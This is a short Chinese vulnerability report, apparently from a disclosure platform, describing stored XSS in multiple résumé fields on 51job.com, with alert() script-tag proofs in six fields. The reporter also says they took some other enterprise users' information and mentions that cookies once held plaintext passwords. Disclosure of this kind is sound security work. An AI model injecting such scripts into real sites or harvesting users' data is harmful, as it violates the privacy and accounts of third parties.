简要描述：51job.com个人简历多地方存储型XSS，导致可以获得企业用户访问的一些信息，因为申请企业用户需要验证，就没有测试。

但是获取了别的企业用户的一点信息。

详细说明：插入的。

 

漏洞证明：

<td id="Cur_Val" valign="top"><script>alert("自我评价跨站")</script></td>

 

<td id="Cur_Val" colspan="2" valign="top"><script>alert("工作描述跨站")</script></td>

 

<td width="84%" id="Cur_Val" valign="top"><script>alert("项目描述跨站")</script></td>

 

<td id="Cur_Val" valign="top"><script>alert("责任描述跨站")</script></td>

 

<td id="Cur_Val" colspan="4" valign="top" height="30"><script>alert("专业描述跨站")</script></td>

 

<td width="86%" id="Cur_Val"><script>alert("内容跨站")</script></td>

完全木有过滤什么的。只要你插。

 

 

下面是偷的一点点东西。。

 

 

不确定为什么偷不到其他的信息。

前些天的cookie里面都有明文密码的。

现在没了。

修复方案：过滤，转义。

 

 

作者  Tea@乌云